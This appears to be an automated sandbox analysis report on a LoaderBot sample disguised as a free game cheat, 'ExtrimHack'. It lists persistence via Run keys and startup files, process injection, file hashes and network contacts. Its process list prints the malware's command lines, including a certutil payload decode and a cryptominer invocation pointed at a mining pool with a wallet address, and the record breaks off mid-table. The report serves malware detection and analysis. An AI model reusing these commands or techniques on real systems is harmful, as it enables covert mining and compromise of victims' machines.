Analysis Overview
SHA256
83c30ab7d6d122b5d7ce2a4da5600f4c69f4c7593d91d514de1dd007398fe696
Threat Level: Known bad
The file 83c30ab7d6d122b5d7ce2a4da5600f4c69f4c7593d91d514de1dd007398fe696 was found to be: Known bad.
Malicious Activity Summary
LoaderBot
LoaderBot executable
Executes dropped EXE
Drops startup file
Checks computer location settings
Loads dropped DLL
Adds Run key to start application
Suspicious use of SetThreadContext
Enumerates physical storage devices
NSIS installer
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: LoadsDriver
Suspicious use of SendNotifyMessage
Runs ping.exe
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-07-08 08:42
Signatures
NSIS installer
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2022-07-08 08:42
Reported
2022-07-08 15:47
Platform
win10v2004-20220414-en
Max time kernel
146s
Max time network
163s
Command Line
Signatures
LoaderBot
LoaderBot executable
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Roaming\1337\Ex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\1337\ExtrimHack [free][26.08.2020].exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\1337\Ex.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\83c30ab7d6d122b5d7ce2a4da5600f4c69f4c7593d91d514de1dd007398fe696.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sys.url | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\83c30ab7d6d122b5d7ce2a4da5600f4c69f4c7593d91d514de1dd007398fe696.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\RegAsm.exe" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 5112 set thread context of 1508 | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Enumerates physical storage devices
Runs ping.exe
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\83c30ab7d6d122b5d7ce2a4da5600f4c69f4c7593d91d514de1dd007398fe696.exe
"C:\Users\Admin\AppData\Local\Temp\83c30ab7d6d122b5d7ce2a4da5600f4c69f4c7593d91d514de1dd007398fe696.exe"
C:\Users\Admin\AppData\Roaming\1337\Ex.exe
"C:\Users\Admin\AppData\Roaming\1337\Ex.exe"
C:\Users\Admin\AppData\Roaming\1337\ExtrimHack [free][26.08.2020].exe
"C:\Users\Admin\AppData\Roaming\1337\ExtrimHack [free][26.08.2020].exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c echo pUVyOKPt
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c mkdir C:\Users\Admin\AppData\Roaming\Sysfiles & cmd < XuGJAWtEjFqgoZUl.com
C:\Windows\SysWOW64\cmd.exe
cmd
C:\Windows\SysWOW64\PING.EXE
ping -n 1 moLu.nnnbID
C:\Windows\SysWOW64\certutil.exe
certutil -decode qTh.com y
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com
csrss.com y
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 30
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com y
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQqTgX5TEtWmQ8ZmVZ7 -p x -k -v=0 --donate-level=1 -t 1
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 8.8.8.8:53 | moLu.nnnbID | udp |
| US | 8.8.8.8:53 | chpMHpkOfJY.chpMHpkOfJY | udp |
| US | 93.184.220.29:80 | | tcp |
| US | 93.184.220.29:80 | | tcp |
| US | 93.184.220.29:80 | | tcp |
| US | 67.26.215.254:80 | | tcp |
| US | 67.26.215.254:80 | | tcp |
| NL | 52.178.17.2:443 | | tcp |
| IE | 20.54.89.106:443 | | tcp |
| NL | 104.110.191.140:80 | | tcp |
| NL | 104.110.191.140:80 | | tcp |
| NL | 104.110.191.140:80 | | tcp |
| US | 13.107.21.200:443 | | tcp |
| US | 52.152.108.96:443 | | tcp |
| US | 8.8.8.8:53 | 151.122.125.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 142.132.131.248:3333 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 176.122.125.40.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\nss9040.tmp\System.dll
| MD5 | 2ae993a2ffec0c137eb51c8832691bcb |
| SHA1 | 98e0b37b7c14890f8a599f35678af5e9435906e1 |
| SHA256 | 681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59 |
| SHA512 | 2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9 |
memory/4708-131-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\1337\Ex.exe
| MD5 | 7afcb8667f1ec33f0cc084936a8a4044 |
| SHA1 | a2755123f3515fbfcbd5b1ab38c22fa757b8afa8 |
| SHA256 | 2304cf3b3d0753318d60c2769c535a164d5f56ee0343c59ac616036d95e8ad71 |
| SHA512 | bc04b81c01df03b360c225709d2db3078d1fb45fc2a67713f5f5154d050c71e241c2c7590f510d9f7ac3a0a4bc820b3b171d96cb56d23c0496df184e527162b8 |
C:\Users\Admin\AppData\Roaming\1337\Ex.exe
| MD5 | 7afcb8667f1ec33f0cc084936a8a4044 |
| SHA1 | a2755123f3515fbfcbd5b1ab38c22fa757b8afa8 |
| SHA256 | 2304cf3b3d0753318d60c2769c535a164d5f56ee0343c59ac616036d95e8ad71 |
| SHA512 | bc04b81c01df03b360c225709d2db3078d1fb45fc2a67713f5f5154d050c71e241c2c7590f510d9f7ac3a0a4bc820b3b171d96cb56d23c0496df184e527162b8 |
memory/4256-134-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\1337\ExtrimHack [free][26.08.2020].exe
| MD5 | 6ceb80ab1825ed999d2e16d19de17cb0 |
| SHA1 | 0b553faf5727ffc81c1f1a48563b7bc462850c9e |
| SHA256 | 06c3021e19f97393e42b6f1d86a27b5f3737dffb9af86994cc9037753624045e |
| SHA512 | f5d47e2c0b845660ec8d815eb2fa2fc9527e5faebcfae68dcdd0612de95fbb51f31b2dc698892a35f34033a82866b6b6a2081546c75aa807d7abba8784536f39 |
C:\Users\Admin\AppData\Roaming\1337\ExtrimHack [free][26.08.2020].exe
| MD5 | 6ceb80ab1825ed999d2e16d19de17cb0 |
| SHA1 | 0b553faf5727ffc81c1f1a48563b7bc462850c9e |
| SHA256 | 06c3021e19f97393e42b6f1d86a27b5f3737dffb9af86994cc9037753624045e |
| SHA512 | f5d47e2c0b845660ec8d815eb2fa2fc9527e5faebcfae68dcdd0612de95fbb51f31b2dc698892a35f34033a82866b6b6a2081546c75aa807d7abba8784536f39 |
memory/4916-137-0x0000000000000000-mapping.dmp
memory/3176-138-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\XuGJAWtEjFqgoZUl.com
| MD5 | 0047726ce0f38e02fda2068d7ff7ceff |
| SHA1 | 0702fd3e290b95b70b5fc3b70cdb57c808baceb7 |
| SHA256 | 0423e080422306752ccf52e4639a8f6e58596176e730d10bd812012ccf4f296b |
| SHA512 | 00b525c341b3297e3b011065b32bab9d29eee920e7faebea93e4fcc4fef69b166c11c10291cc9ba9b931551eca3dc9ddae27b681c4d4423478ea3a65d29c7d83 |
memory/2524-140-0x0000000000000000-mapping.dmp
memory/4400-141-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\EWSiFeMZzkUETFRYRVL.com
| MD5 | c317736793ef5129f12a3568cd679422 |
| SHA1 | e68b55969c5f2159c847a629fac3731c0c315d53 |
| SHA256 | cbb5d906c63cbcb891b35e53156b643ac26c5dec922f43b2fd121ccca60beb62 |
| SHA512 | 69cb5fd5f1a30c3c786ca945b8de6a460d03605fc3416a3c33e69691603e1a43ad0cfefe9cd5d6af1a154b701ecf34526cc05d9235a4e38acf994eb0edb1a82c |
memory/2164-143-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\qTh.com
| MD5 | 13a508782d30a527e997a64996920287 |
| SHA1 | 4628a103700d13b6f3920b3a8a06e9757bf0a9eb |
| SHA256 | e06ad6278f8cdccb51ed58aee3d6ba97bd770b2d8b827746e539770fc959354e |
| SHA512 | cd860c7c8eea0faf0e62f1e695f60c02050c284617265f3e9c11dac4e4cbea34cb656719ae6bdeb39a36dd1446bb443cbcf9c9f4a595c1749f9088d7c082d142 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com
| MD5 | 8ed172328f643375ac09b31ffba0eb63 |
| SHA1 | c6716e5e5a311f597e37c5660b0387ab8f77b2a0 |
| SHA256 | 23e87924005aeef08ab3c9402aa749c0373ed9fa6c1706c13ca1df5ec33f8928 |
| SHA512 | 79efbac3cbf2bbbf1b5572a3036845fd544210a01adf9850d22587df12fd84832e14e8f7e0476955a8d9bb42ff0be5ca4443cee8e83dc396e70d850e31c60938 |
memory/4568-147-0x0000000000000000-mapping.dmp
memory/4380-145-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\y
| MD5 | dbcc4336d132df084c59bbddff9693f5 |
| SHA1 | 172d404379f6d288db4eacaa11bf0fa1ccffa451 |
| SHA256 | ea3b51ae7fb4264cd4aca28f02fa027bb25ce69a9ece5ff1f9f581b1ae62c84e |
| SHA512 | d7209e47c9ef7e8f0db4bc736828e79d745415dde0dbaa7b4d5a21d6ee3406b139f3565cdcae16911c330d3ebbe1bcbe77f5e40d2313909a3b7b58697d3d4e34 |
memory/5112-149-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com
| MD5 | 8ed172328f643375ac09b31ffba0eb63 |
| SHA1 | c6716e5e5a311f597e37c5660b0387ab8f77b2a0 |
| SHA256 | 23e87924005aeef08ab3c9402aa749c0373ed9fa6c1706c13ca1df5ec33f8928 |
| SHA512 | 79efbac3cbf2bbbf1b5572a3036845fd544210a01adf9850d22587df12fd84832e14e8f7e0476955a8d9bb42ff0be5ca4443cee8e83dc396e70d850e31c60938 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\ZcaqngYeMJ.com
| MD5 | 09cc8b02108c2ca6db6197e37b165a65 |
| SHA1 | 9f245c5206ce171cfc288ed8bf05896d1b36a1f0 |
| SHA256 | 89ad1822d2ee2d5e39d2e4aae2016562244f7ea43071c192e8989a3c2544d998 |
| SHA512 | d50c20b554dd85996f8b7432fb3d3668c3fbfcd77314a4adc476861373a0350b122be61ab1aa087153e45c48cf6a453d0829ccfa4786cf679ee3dccb7cffadae |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com
| MD5 | 8ed172328f643375ac09b31ffba0eb63 |
| SHA1 | c6716e5e5a311f597e37c5660b0387ab8f77b2a0 |
| SHA256 | 23e87924005aeef08ab3c9402aa749c0373ed9fa6c1706c13ca1df5ec33f8928 |
| SHA512 | 79efbac3cbf2bbbf1b5572a3036845fd544210a01adf9850d22587df12fd84832e14e8f7e0476955a8d9bb42ff0be5ca4443cee8e83dc396e70d850e31c60938 |
memory/1508-153-0x0000000000000000-mapping.dmp
memory/1508-154-0x0000000012580000-0x00000000127D4000-memory.dmp
memory/1508-155-0x00000000176B0000-0x0000000017716000-memory.dmp
memory/2520-156-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
| MD5 | 02569a7a91a71133d4a1023bf32aa6f4 |
| SHA1 | 0f16bcb3f3f085d3d3be912195558e9f9680d574 |
| SHA256 | 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0 |
| SHA512 | 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322 |
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
| MD5 | 02569a7a91a71133d4a1023bf32aa6f4 |
| SHA1 | 0f16bcb3f3f085d3d3be912195558e9f9680d574 |
| SHA256 | 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0 |
| SHA512 | 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322 |
memory/2520-159-0x0000000140000000-0x0000000140B75000-memory.dmp
memory/2520-160-0x00000000001D0000-0x00000000001E4000-memory.dmp
memory/2520-161-0x0000000000400000-0x0000000000420000-memory.dmp
memory/2520-162-0x0000000000420000-0x0000000000440000-memory.dmp
memory/2520-163-0x0000000000420000-0x0000000000440000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2022-07-08 08:42
Reported
2022-07-08 15:49
Platform
win7-20220414-en
Max time kernel
115s
Max time network
78s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Roaming\1337\Ex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\1337\ExtrimHack [free][26.08.2020].exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
Drops startup file
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sys.url | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\83c30ab7d6d122b5d7ce2a4da5600f4c69f4c7593d91d514de1dd007398fe696.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\83c30ab7d6d122b5d7ce2a4da5600f4c69f4c7593d91d514de1dd007398fe696.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\83c30ab7d6d122b5d7ce2a4da5600f4c69f4c7593d91d514de1dd007398fe696.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
Enumerates physical storage devices
Runs ping.exe
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\83c30ab7d6d122b5d7ce2a4da5600f4c69f4c7593d91d514de1dd007398fe696.exe
"C:\Users\Admin\AppData\Local\Temp\83c30ab7d6d122b5d7ce2a4da5600f4c69f4c7593d91d514de1dd007398fe696.exe"
C:\Users\Admin\AppData\Roaming\1337\Ex.exe
"C:\Users\Admin\AppData\Roaming\1337\Ex.exe"
C:\Users\Admin\AppData\Roaming\1337\ExtrimHack [free][26.08.2020].exe
"C:\Users\Admin\AppData\Roaming\1337\ExtrimHack [free][26.08.2020].exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c echo pUVyOKPt
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c mkdir C:\Users\Admin\AppData\Roaming\Sysfiles & cmd < XuGJAWtEjFqgoZUl.com
C:\Windows\SysWOW64\cmd.exe
cmd
C:\Windows\SysWOW64\PING.EXE
ping -n 1 moLu.nnnbID
C:\Windows\SysWOW64\certutil.exe
certutil -decode qTh.com y
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com
csrss.com y
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 30
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com y
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 8.8.8.8:53 | moLu.nnnbID | udp |
| US | 8.8.8.8:53 | chpMHpkOfJY.chpMHpkOfJY | udp |
Files
memory/1884-54-0x0000000075E51000-0x0000000075E53000-memory.dmp
\Users\Admin\AppData\Local\Temp\nst28F7.tmp\System.dll
| MD5 | 2ae993a2ffec0c137eb51c8832691bcb |
| SHA1 | 98e0b37b7c14890f8a599f35678af5e9435906e1 |
| SHA256 | 681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59 |
| SHA512 | 2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9 |
\Users\Admin\AppData\Roaming\1337\Ex.exe
| MD5 | 7afcb8667f1ec33f0cc084936a8a4044 |
| SHA1 | a2755123f3515fbfcbd5b1ab38c22fa757b8afa8 |
| SHA256 | 2304cf3b3d0753318d60c2769c535a164d5f56ee0343c59ac616036d95e8ad71 |
| SHA512 | bc04b81c01df03b360c225709d2db3078d1fb45fc2a67713f5f5154d050c71e241c2c7590f510d9f7ac3a0a4bc820b3b171d96cb56d23c0496df184e527162b8 |
memory/976-57-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\1337\Ex.exe
| MD5 | 7afcb8667f1ec33f0cc084936a8a4044 |
| SHA1 | a2755123f3515fbfcbd5b1ab38c22fa757b8afa8 |
| SHA256 | 2304cf3b3d0753318d60c2769c535a164d5f56ee0343c59ac616036d95e8ad71 |
| SHA512 | bc04b81c01df03b360c225709d2db3078d1fb45fc2a67713f5f5154d050c71e241c2c7590f510d9f7ac3a0a4bc820b3b171d96cb56d23c0496df184e527162b8 |
C:\Users\Admin\AppData\Roaming\1337\Ex.exe
| MD5 | 7afcb8667f1ec33f0cc084936a8a4044 |
| SHA1 | a2755123f3515fbfcbd5b1ab38c22fa757b8afa8 |
| SHA256 | 2304cf3b3d0753318d60c2769c535a164d5f56ee0343c59ac616036d95e8ad71 |
| SHA512 | bc04b81c01df03b360c225709d2db3078d1fb45fc2a67713f5f5154d050c71e241c2c7590f510d9f7ac3a0a4bc820b3b171d96cb56d23c0496df184e527162b8 |
\Users\Admin\AppData\Roaming\1337\ExtrimHack [free][26.08.2020].exe
| MD5 | 6ceb80ab1825ed999d2e16d19de17cb0 |
| SHA1 | 0b553faf5727ffc81c1f1a48563b7bc462850c9e |
| SHA256 | 06c3021e19f97393e42b6f1d86a27b5f3737dffb9af86994cc9037753624045e |
| SHA512 | f5d47e2c0b845660ec8d815eb2fa2fc9527e5faebcfae68dcdd0612de95fbb51f31b2dc698892a35f34033a82866b6b6a2081546c75aa807d7abba8784536f39 |
memory/1940-62-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\1337\ExtrimHack [free][26.08.2020].exe
| MD5 | 6ceb80ab1825ed999d2e16d19de17cb0 |
| SHA1 | 0b553faf5727ffc81c1f1a48563b7bc462850c9e |
| SHA256 | 06c3021e19f97393e42b6f1d86a27b5f3737dffb9af86994cc9037753624045e |
| SHA512 | f5d47e2c0b845660ec8d815eb2fa2fc9527e5faebcfae68dcdd0612de95fbb51f31b2dc698892a35f34033a82866b6b6a2081546c75aa807d7abba8784536f39 |
memory/1992-64-0x0000000000000000-mapping.dmp
memory/1860-65-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\XuGJAWtEjFqgoZUl.com
| MD5 | 0047726ce0f38e02fda2068d7ff7ceff |
| SHA1 | 0702fd3e290b95b70b5fc3b70cdb57c808baceb7 |
| SHA256 | 0423e080422306752ccf52e4639a8f6e58596176e730d10bd812012ccf4f296b |
| SHA512 | 00b525c341b3297e3b011065b32bab9d29eee920e7faebea93e4fcc4fef69b166c11c10291cc9ba9b931551eca3dc9ddae27b681c4d4423478ea3a65d29c7d83 |
memory/588-67-0x0000000000000000-mapping.dmp
memory/1180-68-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\EWSiFeMZzkUETFRYRVL.com
| MD5 | c317736793ef5129f12a3568cd679422 |
| SHA1 | e68b55969c5f2159c847a629fac3731c0c315d53 |
| SHA256 | cbb5d906c63cbcb891b35e53156b643ac26c5dec922f43b2fd121ccca60beb62 |
| SHA512 | 69cb5fd5f1a30c3c786ca945b8de6a460d03605fc3416a3c33e69691603e1a43ad0cfefe9cd5d6af1a154b701ecf34526cc05d9235a4e38acf994eb0edb1a82c |
memory/860-70-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\qTh.com
| MD5 | 13a508782d30a527e997a64996920287 |
| SHA1 | 4628a103700d13b6f3920b3a8a06e9757bf0a9eb |
| SHA256 | e06ad6278f8cdccb51ed58aee3d6ba97bd770b2d8b827746e539770fc959354e |
| SHA512 | cd860c7c8eea0faf0e62f1e695f60c02050c284617265f3e9c11dac4e4cbea34cb656719ae6bdeb39a36dd1446bb443cbcf9c9f4a595c1749f9088d7c082d142 |
\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com
| MD5 | 8ed172328f643375ac09b31ffba0eb63 |
| SHA1 | c6716e5e5a311f597e37c5660b0387ab8f77b2a0 |
| SHA256 | 23e87924005aeef08ab3c9402aa749c0373ed9fa6c1706c13ca1df5ec33f8928 |
| SHA512 | 79efbac3cbf2bbbf1b5572a3036845fd544210a01adf9850d22587df12fd84832e14e8f7e0476955a8d9bb42ff0be5ca4443cee8e83dc396e70d850e31c60938 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com
| MD5 | 8ed172328f643375ac09b31ffba0eb63 |
| SHA1 | c6716e5e5a311f597e37c5660b0387ab8f77b2a0 |
| SHA256 | 23e87924005aeef08ab3c9402aa749c0373ed9fa6c1706c13ca1df5ec33f8928 |
| SHA512 | 79efbac3cbf2bbbf1b5572a3036845fd544210a01adf9850d22587df12fd84832e14e8f7e0476955a8d9bb42ff0be5ca4443cee8e83dc396e70d850e31c60938 |
memory/832-76-0x0000000000000000-mapping.dmp
memory/1552-74-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\y
| MD5 | dbcc4336d132df084c59bbddff9693f5 |
| SHA1 | 172d404379f6d288db4eacaa11bf0fa1ccffa451 |
| SHA256 | ea3b51ae7fb4264cd4aca28f02fa027bb25ce69a9ece5ff1f9f581b1ae62c84e |
| SHA512 | d7209e47c9ef7e8f0db4bc736828e79d745415dde0dbaa7b4d5a21d6ee3406b139f3565cdcae16911c330d3ebbe1bcbe77f5e40d2313909a3b7b58697d3d4e34 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com
| MD5 | 8ed172328f643375ac09b31ffba0eb63 |
| SHA1 | c6716e5e5a311f597e37c5660b0387ab8f77b2a0 |
| SHA256 | 23e87924005aeef08ab3c9402aa749c0373ed9fa6c1706c13ca1df5ec33f8928 |
| SHA512 | 79efbac3cbf2bbbf1b5572a3036845fd544210a01adf9850d22587df12fd84832e14e8f7e0476955a8d9bb42ff0be5ca4443cee8e83dc396e70d850e31c60938 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com
| MD5 | 8ed172328f643375ac09b31ffba0eb63 |
| SHA1 | c6716e5e5a311f597e37c5660b0387ab8f77b2a0 |
